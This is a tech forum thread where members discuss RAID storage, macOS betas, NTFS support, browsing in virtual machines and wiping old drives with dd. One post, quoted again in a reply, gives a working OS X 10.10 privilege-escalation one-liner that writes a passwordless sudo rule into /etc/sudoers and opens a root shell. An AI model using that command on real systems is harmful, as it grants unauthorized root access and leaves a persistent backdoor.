Jump to content

Recommended Posts

Posted

I've got 12TB in a Drobo 5N and I still have 4TB free after backing up my 6TB iTunes drive and two time machine backups for the iMac and MacBook Pro. But if I combined the years of crap saved on various 1, 2, and 3TB drives I'd need 20TB.

Posted (edited)

I dont actually need 64TB at the moment.  But it exists, which means I need it.  

 

They have 4k porn now.

 

Liberating bitcoin doesn't feel the same as spending dollars for some reason.  

Edited by aardvark baguette
  • Like 2
  • 2 weeks later...
Posted

PSA: Stay the fuck away from the iOS 9.0 public beta. In its current form it is quite a mess.

 

Worst problem? At least a solid 25% of my apps flat out do not work on it, including Plex and the Oppo app I use to control my BDP-105.

 

They also completely screwed up the podcasts app.

 

--

 

I've been having much better success with the El Capitan beta on my work computer. The full-screen snap feature works really well. You can also set the top menu bar to auto hide!!!!!!

Posted

forgot to update this thread.  

 

got the raid, like an idiot did a reformat from disc utility rather than the g tech software, which I did afterwards.  

took 2 days to synchronize back to raid 5.  

only saw options for raid 0 and raid 5 (so i was obviously doing something wrong) so I said screw it and went with raid 5.  didn't want to spend the whole week resyncing multiple times.

i have backblaze anyway.

 

i like this thing a helluva lot better than my old drobo, but to be fair that wasn't thunderbolt.

 

Posted

Wow, that's a lot of storage!

 

Anybody know offhand if there's going to be any special trick to upgrading the two 3TB drives in a 6TB LaCie thunderbolt to a pair of 4TB or 6TB drives, or is it all done in software (Disk Utility)?  I ask because my old LaCie 2TB RAID network drive requires cloning the OS to the new disks before updating (beyond my skills).  I've never upgraded a RAID other than my Drobo 5N, which is a breeze.

Posted

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

 

Gives a root prompt without a password on 10.10.x (works on 10.10.5 on my computer)

Posted

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

 

Gives a root prompt without a password on 10.10.x (works on 10.10.5 on my computer)

 

I assume this is intended for me and my clone the LaCie RAID OS issue?  If so, and if I set the 2TB RAID to be a 1TB mirrored RAID, then a single drive can be recognized by the OS when I put on an SATA to USB cable, and then I could clone the OS by copying all the hidden files to the larger drives, and install the larger drives into the old case?

Posted

I'm not sure when this changed, but I hooked up a NTFS usb drive to my mac pro last night and was able to move a bunch of files over.

I expected it to not work, but decided to try it anyway.  No special software to do it, just native in OSX.

 

The reason this matters to me is that my piece of shit HP elitebook will only let me format to NTFS.  Even that has to be done in command line, I assume because of my work's security settings.

 

That makes things about a 1000 times easier.

 

I love this new computer so much.  

  • Like 2
Posted

Can you write on the NTFS USB drive?  If I'm not mistaken, you could always read NTFS drives (and copy files from them), but couldn't actually write on them without 3rd party software.

Posted (edited)

I sometimes find myself searching website that may have malware, etc (not porn, for example, I was just searching about viruses because of a problem with my dad's computer).  Given the increasing amount of malware out there, I thought it might be useful to be browsing in a virtual machine.  Is parallels still good or is there something better out there.  For a related question, is there a way to sandbox a single browser? 

Edited by shellylh
Posted

OK I didn't know that. I guess Firefox is not? That may explain why my mom always has a bunch of shit Malware on her Mac whenever I see her. I forced her to start using Chrome so that is probably a good start.

I guess I actually want to use a VM, not a sanboxed browser. It seems a bit more secure.

Posted (edited)

This is not really the right thread but I thought some people here would know the answer.

 

I am erasing the drives of some old (2005 and 2008) Windows tablet pcs so that I can recycle them.  I am using a live usb boot of linux  to erase the hard drive.  I first tried 

 

sudo wipe /dev/sda

 

but that said it was going to take 4 weeks and 1 day, not a good solution. Then I tried 

 

sudo wipe -q -Q 1 /dev/sda

 

and that was still going to take over 19 hours.  

 

So I am thinking just writing over it with zeros using dd. 

 

sudo dd if=/dev/zero of=/dev/sda

 

Will that be secure enough?  Perhaps I can run it 2-3 times. 

 

I could also use random data (but maybe that will take too long)

 

sudo dd if=/dev/urandom of=/dev/sda

 

Any better options?

Edited by shellylh
Posted

3 times, 0, 1, then random would be secure enough.  What I do is just pull out the drives, and recycle the computer without the drive.  I have a drawer full of old hard drives.

  • Like 1

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.